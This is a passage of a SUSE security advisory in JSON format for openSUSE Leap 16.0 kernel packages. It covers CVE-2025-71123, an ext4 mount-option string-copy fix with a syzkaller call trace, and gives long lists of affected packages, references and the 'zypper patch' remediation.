"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen include/linux/fortify-string.h:235 [inline]\n sized_strscpy include/linux/fortify-string.h:309 [inline]\n parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline]\n __ext4_fill_super fs/ext4/super.c:5261 [inline]\n ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706\n get_tree_bdev_flags+0x387/0x620 fs/super.c:1636\n vfs_get_tree+0x93/0x380 fs/super.c:1814\n do_new_mount fs/namespace.c:3553 [inline]\n path_mount+0x6ae/0x1f70 fs/namespace.c:3880\n do_mount fs/namespace.c:3893 [inline]\n __do_sys_mount fs/namespace.c:4103 [inline]\n __se_sys_mount fs/namespace.c:4080 [inline]\n __x64_sys_mount+0x280/0x300 fs/namespace.c:4080\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nSince userspace is expected to provide s_mount_opts field to be at most 63\ncharacters long with the ending byte being NUL-term, use a 64-byte buffer\nwhich matches the size of s_mount_opts, so that strscpy_pad() does its job\nproperly. Return with error if the user still managed to provide a\nnon-NUL-term string here.\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71123",
"url": "https://www.suse.com/security/cve/CVE-2025-71123"
},
{
"category": "external",
"summary": "SUSE Bug 1256757 for CVE-2025-71123",
"url": "https://bugzilla.suse.com/1256757"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
